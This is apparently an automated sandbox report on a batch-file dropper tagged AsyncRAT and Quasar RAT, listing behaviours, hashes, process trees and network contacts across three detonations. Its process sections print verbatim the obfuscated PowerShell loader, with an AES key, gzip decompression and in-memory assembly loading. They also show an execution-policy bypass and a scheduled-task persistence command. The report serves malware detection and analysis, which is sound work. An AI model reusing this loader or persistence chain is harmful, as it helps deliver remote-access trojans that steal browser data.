Malware Analysis Report

2025-04-14 05:06

Sample ID 230112-t174sagg29
Target sky.bat
SHA256 d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e
Tags: asyncrat quasar default office04 rat spyware stealer trojan

Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e

Threat Level: Known bad

The file sky.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat quasar default office04 rat spyware stealer trojan

Quasar RAT

AsyncRat

Quasar payload

Async RAT payload

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-12 16:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-12 16:32

Reported

2023-01-12 16:35

Platform

win7-20220812-en

Max time kernel

43s

Max time network

46s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1176 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\sky.bat.exe
PID 1176 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\sky.bat.exe
PID 1176 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))

Network

N/A

Files

memory/884-55-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/884-57-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp

memory/884-58-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

memory/884-60-0x00000000025E4000-0x00000000025E7000-memory.dmp

memory/884-59-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

memory/884-61-0x00000000025E4000-0x00000000025E7000-memory.dmp

memory/884-62-0x00000000025EB000-0x000000000260A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-12 16:32

Reported

2023-01-12 16:35

Platform

win10-20220901-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

Signatures

AsyncRat

rat asyncrat

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mbwito.bat" "

C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

"mbwito.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mbwito.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe" /rl HIGHEST /f

Network

Country Destination Domain Proto
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:6606 tcp
N/A 20.189.173.4:443 tcp
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:4782 tcp
N/A 8.8.8.8:53 tools.keycdn.com udp
N/A 185.172.148.96:443 tools.keycdn.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 64.185.227.155:443 api.ipify.org tcp
N/A 154.12.250.38:6606 tcp

Files

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4604-120-0x0000000000000000-mapping.dmp

memory/4604-127-0x00000112AD970000-0x00000112AD992000-memory.dmp

memory/4604-132-0x00000112ADB20000-0x00000112ADB96000-memory.dmp

memory/4604-139-0x00000112AD040000-0x00000112AD04E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4604-141-0x00000112AD050000-0x00000112AD062000-memory.dmp

memory/4604-144-0x00000112ADBA0000-0x00000112ADC1E000-memory.dmp

memory/4604-145-0x00000112ADAE0000-0x00000112ADAFE000-memory.dmp

memory/4604-154-0x00000112ADAC0000-0x00000112ADACA000-memory.dmp

memory/4604-161-0x00000112ADC20000-0x00000112ADC80000-memory.dmp

memory/4604-168-0x00000112AE3B0000-0x00000112AE440000-memory.dmp

memory/4604-171-0x00000112AE440000-0x00000112AE462000-memory.dmp

memory/800-178-0x0000000000000000-mapping.dmp

memory/4904-179-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mbwito.bat

MD5 2f84982ec56d82645ac61de4fb3e6e50
SHA1 92817fc3db66755ad189049f8e4ad3dbbaaa6db1
SHA256 56aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
SHA512 2a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd

memory/3164-198-0x0000000000000000-mapping.dmp

memory/3964-200-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6128469adf6a46e1fde5c24182bcbece
SHA1 b1056fc0c08aa1c70dd2c4b4aaeb6ddd7661d981
SHA256 d8f5a2e911a00db37c73ad0251651a5a72cdc5455f5ae8ca2ea275d3351fc61c
SHA512 efec3e82e4c59657c2540c6c77ca5e4170fbea30d239df7d15b8f0459aba0b3ce5df3cc25ae321585f5f32e4ecc0a2f2fccbc831521598e892c5bb37ae0e8500

memory/3964-218-0x000001A472410000-0x000001A472452000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/3964-220-0x000001A4726F0000-0x000001A472778000-memory.dmp

memory/4740-222-0x0000000000000000-mapping.dmp

memory/3964-227-0x000001A473090000-0x000001A4730E0000-memory.dmp

memory/3964-228-0x000001A4731A0000-0x000001A473252000-memory.dmp

memory/3964-229-0x000001A473430000-0x000001A4735F2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-01-12 16:32

Reported

2023-01-12 16:35

Platform

win10v2004-20220812-en

Max time kernel

135s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

Signatures

AsyncRat

rat asyncrat

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\suuule.bat"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\suuule.bat"'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\suuule.bat" "

C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe

"suuule.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\suuule.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe" /rl HIGHEST /f

Network

Country Destination Domain Proto
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:6606 tcp
N/A 52.168.117.170:443 tcp
N/A 154.12.250.38:6606 tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 154.12.250.38:4782 tcp
N/A 8.8.8.8:53 tools.keycdn.com udp
N/A 185.172.148.96:443 tools.keycdn.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 64.185.227.155:443 api.ipify.org tcp
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:6606 tcp

Files

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/3100-132-0x0000000000000000-mapping.dmp

memory/3100-134-0x000001BB55860000-0x000001BB55882000-memory.dmp

memory/3100-135-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/3100-137-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

memory/3100-138-0x000001BB56100000-0x000001BB56176000-memory.dmp

memory/3100-139-0x000001BB561A0000-0x000001BB561BE000-memory.dmp

memory/460-140-0x0000000000000000-mapping.dmp

memory/5108-141-0x0000000000000000-mapping.dmp

memory/5108-142-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\suuule.bat

MD5 2f84982ec56d82645ac61de4fb3e6e50
SHA1 92817fc3db66755ad189049f8e4ad3dbbaaa6db1
SHA256 56aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
SHA512 2a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd

memory/1924-144-0x0000000000000000-mapping.dmp

memory/5108-145-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

memory/668-146-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/668-149-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/400-151-0x0000000000000000-mapping.dmp

memory/668-152-0x00000243BE3F0000-0x00000243BE440000-memory.dmp

memory/668-153-0x00000243BEA00000-0x00000243BEAB2000-memory.dmp

memory/668-154-0x00000243BF070000-0x00000243BF232000-memory.dmp

memory/668-155-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp